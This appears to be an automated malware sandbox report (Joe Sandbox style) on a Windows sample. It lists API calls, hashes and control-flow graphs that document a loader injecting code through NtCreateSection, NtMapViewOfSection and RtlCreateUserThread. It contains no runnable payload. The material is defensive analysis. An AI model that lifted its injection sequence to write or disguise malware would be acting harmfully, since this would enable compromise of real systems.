                                      • Sleep.KERNELBASE(00001388), ref: 00401936
                                        • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                        • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                        • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectSleepView
                                      • String ID:
                                      • API String ID: 1885482327-0
                                      • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                      • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                      • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                      • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                      APIs
                                      • LocalAlloc.KERNELBASE(00000000,02B19CE4,0041624B), ref: 00415BA8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: AllocLocal
                                      • String ID:
                                      • API String ID: 3494564517-0
                                      • Opcode ID: bc268097d7bb7fb4f78415c0ee36feb01ff13b3e1ebb730f1ec7cab6ec31a301
                                      • Instruction ID: fe12b94824aaeca9f7b044923cb86b1d99ba87f8ef2d7c3be42197bf5250df23
                                      • Opcode Fuzzy Hash: bc268097d7bb7fb4f78415c0ee36feb01ff13b3e1ebb730f1ec7cab6ec31a301
                                      • Instruction Fuzzy Hash: D5B092B09846409BD7008BB0A814B513AA4F308742F404461F60982180CA2014208F14
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2bc0000_FyDBXJE74v.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: .$GetProcAddress.$l
                                      • API String ID: 0-2784972518
                                      • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction ID: e9c4169f1cdbb9451e493c09451d5fc7c88c54de07c593ae9b5ad607450204a3
                                      • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                      • Instruction Fuzzy Hash: A3314BB6900609DFDB10DF99C880BADBBF5FF48324F24448AD941A7210D7B1EA45CFA4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1827444929.0000000002C9D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C9D000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2c9d000_FyDBXJE74v.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction ID: 84bebb68fce0bd668db63136b6069288a32a2711d679339cf53624a4cdb1a196
                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                      • Instruction Fuzzy Hash: 71118E72345101AFDB44DF55DC90FA673EAFB882A4B1980A5EE08CB311E675E801CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                      • Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
                                      • Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
                                      • Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                      • Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
                                      • Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
                                      • Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1827149563.0000000002BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BC0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2bc0000_FyDBXJE74v.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction ID: 036e032725fc328cbafa9cd25af73b3eb867bb778cbe934c1ad8269db9fb5d96
                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                      • Instruction Fuzzy Hash: 1501A776A10604CFDF21EF24C844BAA33E9EB85215F5548E9D906D7241E774A9418B90
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                      • Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
                                      • Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
                                      • Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                      • Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
                                      • Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
                                      • Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                      • Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
                                      • Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
                                      • Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825942541.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                      • Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
                                      • Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
                                      • Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B
                                      APIs
                                      • BuildCommDCBA.KERNEL32(00000000,?), ref: 00415DD1
                                      • WritePrivateProfileStringA.KERNEL32(00418370,0041834C,00418324,00418314), ref: 00415DF5
                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415DFD
                                      • GetNumaAvailableMemoryNode.KERNEL32(00000000,00000000), ref: 00415E3D
                                      • GetComputerNameW.KERNEL32(?,?), ref: 00415E51
                                      • SetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415E5F
                                      • OpenJobObjectA.KERNEL32(00000000,00000000,00418398), ref: 00415E6E
                                      • GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415E7F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: Name$AvailableBuildCalendarCommComputerEnvironmentFreeInfoMemoryNodeNumaObjectOpenPathPrivateProfileShortStringStringsWrite
                                      • String ID: -
                                      • API String ID: 113859268-2547889144
                                      • Opcode ID: 53c3cc1668bbfc59426ceed2c59907604522a8f50e66552bdf02a6620a93bac6
                                      • Instruction ID: abc8187be86aaec5557a924f26b2f4a332d91e2d9627e3e72ea80ce62a19c939
                                      • Opcode Fuzzy Hash: 53c3cc1668bbfc59426ceed2c59907604522a8f50e66552bdf02a6620a93bac6
                                      • Instruction Fuzzy Hash: D721FD31E84344EBD7209FA4DC85BDA7B74EB4CB11F1080AAF64DAA1C0CAB416C48B59
                                      APIs
                                      • QueryDosDeviceA.KERNEL32(00000000,?,00000000), ref: 00415EF4
                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415F0F
                                      • HeapDestroy.KERNEL32(00000000), ref: 00415F2E
                                      • GetNumaHighestNodeNumber.KERNEL32(00000000), ref: 00415F36
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1825971161.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_40b000_FyDBXJE74v.jbxd
                                      Similarity
                                      • API ID: DestroyDeviceEnvironmentFreeHeapHighestNodeNumaNumberQueryStrings
                                      • String ID:
                                      • API String ID: 367530164-0
                                      • Opcode ID: 1631845fca2a3b933b01173c481672e708b800b3662ef8171a9e2b6aaa0f14d0
                                      • Instruction ID: c20d9250ee03896141b2a136b5260c7d7263afdf9e87988df33f4b26659f440c
                                      • Opcode Fuzzy Hash: 1631845fca2a3b933b01173c481672e708b800b3662ef8171a9e2b6aaa0f14d0
                                      • Instruction Fuzzy Hash: 7D01F270A84604DBD710EBA4ED49BDA7BB8EB0C706F804077F60A97281DA3419948B5A

                                      Execution Graph

                                      Execution Coverage:9.5%
                                      Dynamic/Decrypted Code Coverage:29.4%
                                      Signature Coverage:0%
                                      Total number of Nodes:163
                                      Total number of Limit Nodes:7
                                      execution_graph 3377 402e40 3380 402e37 3377->3380 3378 402edf 3380->3378 3381 4018e6 3380->3381 3382 4018f5 3381->3382 3383 40192e Sleep 3382->3383 3384 401949 3383->3384 3386 40195a 3384->3386 3387 401514 3384->3387 3386->3378 3388 401524 3387->3388 3389 4015c4 NtDuplicateObject 3388->3389 3394 4016e0 3388->3394 3390 4015e1 NtCreateSection 3389->3390 3389->3394 3391 401661 NtCreateSection 3390->3391 3392 401607 NtMapViewOfSection 3390->3392 3393 40168d 3391->3393 3391->3394 3392->3391 3395 40162a NtMapViewOfSection 3392->3395 3393->3394 3396 401697 NtMapViewOfSection 3393->3396 3394->3386 3395->3391 3397 401648 3395->3397 3396->3394 3398 4016be NtMapViewOfSection 3396->3398 3397->3391 3398->3394 3399 416360 3402 415f50 3399->3402 3401 416365 3403 415f5d 3402->3403 3404 416152 3403->3404 3405 416017 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW 3403->3405 3406 416160 SetCommState 3404->3406 3410 416179 3404->3410 3407 41607d 7 API calls 3405->3407 3406->3404 3408 416133 3407->3408 3409 41612a GetBoundsRect 3407->3409 3411 416143 3408->3411 3412 41613c PulseEvent 3408->3412 3409->3408 3413 416246 3410->3413 3414 416186 7 API calls 3410->3414 3411->3404 3412->3411 3425 415ba0 LocalAlloc 3413->3425 3422 41621a 3414->3422 3417 41624b LoadLibraryA 3426 415bd0 GetModuleHandleW GetProcAddress VirtualProtect 3417->3426 3419 41629d 3427 415ec0 3419->3427 3421 4162a2 3423 4162d9 InterlockedDecrement 3421->3423 3424 4162ef 3421->3424 3422->3413 3423->3421 3424->3401 3425->3417 3426->3419 3428 415ee9 QueryDosDeviceA 3427->3428 3429 415efa 3427->3429 3428->3429 3438 415d60 3429->3438 3432 415f15 3441 415da0 3432->3441 3433 415f0d FreeEnvironmentStringsA 3433->3432 3436 415f3c 3436->3421 3437 415f2c HeapDestroy GetNumaHighestNodeNumber 3437->3436 3439 415d71 FatalAppExitA GetModuleHandleW 3438->3439 3440 415d83 3438->3440 3439->3440 3440->3432 3440->3433 3442 415dad 3441->3442 3443 415dd9 3442->3443 3444 415dc8 BuildCommDCBA 3442->3444 3445 415de1 WritePrivateProfileStringA FreeEnvironmentStringsA 3443->3445 3448 415e03 3443->3448 3444->3448 3445->3448 3446 415e8a 3446->3436 3446->3437 3448->3446 3449 415e39 GetNumaAvailableMemoryNode GetComputerNameW SetCalendarInfoA OpenJobObjectA GetShortPathNameW 3448->3449 3450 415d90 3448->3450 3449->3448 3453 415d20 3450->3453 3454 415d49 3453->3454 3455 415d3c SetEvent 3453->3455 3454->3448 3455->3454 3456 2de003c 3457 2de0049 3456->3457 3469 2de0e0f SetErrorMode SetErrorMode 3457->3469 3462 2de0265 3463 2de02ce VirtualProtect 3462->3463 3465 2de030b 3463->3465 3464 2de0439 VirtualFree 3468 2de04be LoadLibraryA 3464->3468 3465->3464 3467 2de08c7 3468->3467 3470 2de0223 3469->3470 3471 2de0d90 3470->3471 3472 2de0dad 3471->3472 3473 2de0dbb GetPEB 3472->3473 3474 2de0238 VirtualAlloc 3472->3474 3473->3474 3474->3462 3551 401542 3552 40153b 3551->3552 3553 4015c4 NtDuplicateObject 3552->3553 3558 4016e0 3552->3558 3554 4015e1 NtCreateSection 3553->3554 3553->3558 3555 401661 NtCreateSection 3554->3555 3556 401607 NtMapViewOfSection 3554->3556 3557 40168d 3555->3557 3555->3558 3556->3555 3559 40162a NtMapViewOfSection 3556->3559 3557->3558 3560 401697 NtMapViewOfSection 3557->3560 3559->3555 3561 401648 3559->3561 3560->3558 3562 4016be NtMapViewOfSection 3560->3562 3561->3555 3562->3558 3610 402dd0 3611 402ddc 3610->3611 3612 4018e6 8 API calls 3611->3612 3613 402edf 3611->3613 3612->3613 3506 4018f1 3507 4018f6 3506->3507 3508 40192e Sleep 3507->3508 3509 401949 3508->3509 3510 401514 7 API calls 3509->3510 3511 40195a 3509->3511 3510->3511 3597 401915 3598 40191a 3597->3598 3599 4018c6 3597->3599 3600 40192e Sleep 3598->3600 3601 401949 3600->3601 3602 401514 7 API calls 3601->3602 3603 40195a 3601->3603 3602->3603 3475 402f97 3476 4030ee 3475->3476 3477 402fc1 3475->3477 3477->3476 3478 40307c RtlCreateUserThread NtTerminateProcess 3477->3478 3478->3476 3525 2de0005 3530 2de092b GetPEB 3525->3530 3527 2de0030 3532 2de003c 3527->3532 3531 2de0972 3530->3531 3531->3527 3533 2de0049 3532->3533 3534 2de0e0f 2 API calls 3533->3534 3535 2de0223 3534->3535 3536 2de0d90 GetPEB 3535->3536 3537 2de0238 VirtualAlloc 3536->3537 3538 2de0265 3537->3538 3539 2de02ce VirtualProtect 3538->3539 3541 2de030b 3539->3541 3540 2de0439 VirtualFree 3544 2de04be LoadLibraryA 3540->3544 3541->3540 3543 2de08c7 3544->3543 3587 402d7b 3588 402d38 3587->3588 3588->3587 3589 402dc7 3588->3589 3590 4018e6 8 API calls 3588->3590 3590->3589 3479 2e4f3ba 3480 2e4f3c9 3479->3480 3483 2e4fb5a 3480->3483 3484 2e4fb75 3483->3484 3485 2e4fb7e CreateToolhelp32Snapshot 3484->3485 3486 2e4fb9a Module32First 3484->3486 3485->3484 3485->3486 3487 2e4f3d2 3486->3487 3488 2e4fba9 3486->3488 3490 2e4f819 3488->3490 3491 2e4f844 3490->3491 3492 2e4f855 VirtualAlloc 3491->3492 3493 2e4f88d 3491->3493 3492->3493 3493->3493 3512 4014fe 3513 401506 3512->3513 3514 401531 3512->3514 3515 4015c4 NtDuplicateObject 3514->3515 3520 4016e0 3514->3520 3516 4015e1 NtCreateSection 3515->3516 3515->3520 3517 401661 NtCreateSection 3516->3517 3518 401607 NtMapViewOfSection 3516->3518 3519 40168d 3517->3519 3517->3520 3518->3517 3521 40162a NtMapViewOfSection 3518->3521 3519->3520 3522 401697 NtMapViewOfSection 3519->3522 3521->3517 3523 401648 3521->3523 3522->3520 3524 4016be NtMapViewOfSection 3522->3524 3523->3517 3524->3520 3545 2de0001 3546 2de0005 3545->3546 3547 2de092b GetPEB 3546->3547 3548 2de0030 3547->3548 3549 2de003c 7 API calls 3548->3549 3550 2de0038 3549->3550

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 0 415f50-415f78 2 415f80-415f87 0->2 3 415f89-415f8b 2->3 4 415f8f-415f95 2->4 3->4 5 415f97-415fa1 4->5 6 415fa6-415fb0 4->6 5->6 7 415fb2-415fbe 6->7 8 415fc8-415fcf 6->8 7->8 8->2 9 415fd1-415fd9 8->9 11 415fe0-415fe6 9->11 12 415ff4-415ffb 11->12 13 415fe8-415fee 11->13 14 416001-416008 12->14 15 415ffd 12->15 13->12 14->11 16 41600a-416011 14->16 15->14 17 416152-41615e 16->17 18 416017-416128 InterlockedCompareExchange ReadConsoleA FindAtomW SetConsoleMode SearchPathW SetDefaultCommConfigW MoveFileW GetVersionExW DisconnectNamedPipe ReadConsoleOutputW GetModuleFileNameA LCMapStringA 16->18 19 416160-41616e SetCommState 17->19 22 416133-41613a 18->22 23 41612a-41612d GetBoundsRect 18->23 24 416170-416177 19->24 25 416179-416180 19->25 26 416143-41614f 22->26 27 41613c-41613d PulseEvent 22->27 23->22 24->19 24->25 28 416246-416255 call 415ba0 25->28 29 416186-416240 GetConsoleAliasesLengthA GetStringTypeExW BuildCommDCBA GetTimeFormatW GetFileAttributesW GetConsoleAliasExesLengthA GetBinaryType 25->29 26->17 27->26 34 416257-416268 28->34 35 41628d-416298 LoadLibraryA call 415bd0 28->35 29->28 37 416270-416280 34->37 42 41629d-4162ae call 415ec0 35->42 40 416282 37->40 41 416288-41628b 37->41 40->41 41->35 41->37 47 4162b0-4162b7 42->47 48 4162c3-4162c9 47->48 49 4162b9-4162bf 47->49 50 4162d0-4162d7 48->50 51 4162cb call 415bc0 48->51 49->48 55 4162e6-4162ed 50->55 56 4162d9-4162e0 InterlockedDecrement 50->56 51->50 55->47 57 4162ef-4162ff 55->57 56->55 59 416300-416310 57->59 60 416312 59->60 61 416319-41631c 59->61 60->61 61->59 62 41631e-416329 61->62 63 416330-416335 62->63 64 416337-41633d 63->64 65 41633f-416345 63->65 64->65 66 416347-416354 64->66 65->63 65->66
                                      APIs
                                      • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00416022
                                      • ReadConsoleA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0041603B
                                      • FindAtomW.KERNEL32(00000000), ref: 00416042
                                      • SetConsoleMode.KERNEL32(00000000,00000000), ref: 0041604A
                                      • SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00416062
                                      • SetDefaultCommConfigW.KERNEL32(00000000,?,00000000), ref: 00416089
                                      • MoveFileW.KERNEL32(00000000,00000000), ref: 00416091
                                      • GetVersionExW.KERNEL32(?), ref: 0041609E
                                      • DisconnectNamedPipe.KERNEL32(?), ref: 004160B1
                                      • ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 004160F6
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00416105
                                      • LCMapStringA.KERNEL32(00000000,00000000,004183A0,00000000,?,00000000), ref: 0041611B
                                      • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 0041612D
                                      • PulseEvent.KERNEL32(00000000), ref: 0041613D
                                      • SetCommState.KERNELBASE(00000000,00000000), ref: 00416164
                                      • GetConsoleAliasesLengthA.KERNEL32(00000000), ref: 00416195
                                      • GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 004161A6
                                      • BuildCommDCBA.KERNEL32(00000000,00000000), ref: 004161AE
                                      • GetTimeFormatW.KERNEL32(00000000,00000000,?,004183D0,?,00000000), ref: 004161EE
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 004161F5
                                      • GetConsoleAliasExesLengthA.KERNEL32 ref: 004161FB
                                      • GetBinaryType.KERNEL32(004183E0,?), ref: 0041620D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068533700.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_40b000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Console$CommFile$LengthReadStringType$AliasAliasesAtomAttributesBinaryBoundsBuildCompareConfigDefaultDisconnectEventExchangeExesFindFormatInterlockedModeModuleMoveNameNamedOutputPathPipePulseRectSearchStateTimeVersion
                                      • String ID: k`$}$
                                      • API String ID: 4155975733-956986773
                                      • Opcode ID: ec1e4d95d6be3dfcdf53541fe43f6e0baff54e05d6a8dcf86ef6a62a0be8a3cf
                                      • Instruction ID: eba57e92584bb82605fa89a7ec6af6020b8b03ca4a43cd0270bfcb4f130e7ef6
                                      • Opcode Fuzzy Hash: ec1e4d95d6be3dfcdf53541fe43f6e0baff54e05d6a8dcf86ef6a62a0be8a3cf
                                      • Instruction Fuzzy Hash: 27A11471841A24EBC720DB65DC58ADF7B78EF89351F4140AAF50AA7150CB384A81CBED

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 153 401514-401533 155 401524-40152f 153->155 156 401536-40156e call 401193 153->156 155->156 165 401570 156->165 166 401573-401578 156->166 165->166 168 401898-4018a0 166->168 169 40157e-40158f 166->169 168->166 174 4018a5-4018b7 168->174 172 401595-4015be 169->172 173 401896 169->173 172->173 183 4015c4-4015db NtDuplicateObject 172->183 173->174 180 4018c5 174->180 181 4018bc-4018e3 call 401193 174->181 180->181 183->173 185 4015e1-401605 NtCreateSection 183->185 187 401661-401687 NtCreateSection 185->187 188 401607-401628 NtMapViewOfSection 185->188 187->173 189 40168d-401691 187->189 188->187 191 40162a-401646 NtMapViewOfSection 188->191 189->173 192 401697-4016b8 NtMapViewOfSection 189->192 191->187 194 401648-40165e 191->194 192->173 195 4016be-4016da NtMapViewOfSection 192->195 194->187 195->173 198 4016e0 call 4016e5 195->198
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$View$Create$DuplicateObject
                                      • String ID:
                                      • API String ID: 1546783058-0
                                      • Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                      • Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
                                      • Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
                                      • Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 200 4014fe-401503 201 401531-40156e call 401193 200->201 202 401506-401511 200->202 212 401570 201->212 213 401573-401578 201->213 212->213 215 401898-4018a0 213->215 216 40157e-40158f 213->216 215->213 221 4018a5-4018b7 215->221 219 401595-4015be 216->219 220 401896 216->220 219->220 230 4015c4-4015db NtDuplicateObject 219->230 220->221 227 4018c5 221->227 228 4018bc-4018e3 call 401193 221->228 227->228 230->220 232 4015e1-401605 NtCreateSection 230->232 234 401661-401687 NtCreateSection 232->234 235 401607-401628 NtMapViewOfSection 232->235 234->220 236 40168d-401691 234->236 235->234 238 40162a-401646 NtMapViewOfSection 235->238 236->220 239 401697-4016b8 NtMapViewOfSection 236->239 238->234 241 401648-40165e 238->241 239->220 242 4016be-4016da NtMapViewOfSection 239->242 241->234 242->220 245 4016e0 call 4016e5 242->245
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                      Memory Dump Source
                                      • Source File: 00000005.00000002.2068509559.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_5_2_400000_wsbgrgh.jbxd
                                      Similarity
                                      • API ID: Section$CreateDuplicateObjectView
                                      • String ID:
                                      • API String ID: 1652636561-0
                                      • Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                      • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                      • Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
                                      • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 247 401542-40156e call 401193 256 401570 247->256 257 401573-401578 247->257 256->257 259 401898-4018a0 257->259 260 40157e-40158f 257->260 259->257 265 4018a5-4018b7 259->265 263 401595-4015be 260->263 264 401896 260->264 263->264 274 4015c4-4015db NtDuplicateObject 263->274 264->265 271 4018c5 265->271 272 4018bc-4018e3 call 401193 265->272 271->272 274->264 276 4015e1-401605 NtCreateSection 274->276 278 401661-401687 NtCreateSection 276->278 279 401607-401628 NtMapViewOfSection 276->279 278->264 280 40168d-401691 278->280 279->278 282 40162a-401646 NtMapViewOfSection 279->282 280->264 283 401697-4016b8 NtMapViewOfSection 280->283 282->278 285 401648-40165e 282->285 283->264 286 4016be-4016da NtMapViewOfSection 283->286 285->278 286->264 289 4016e0 call 4016e5 286->289
                                      APIs
                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
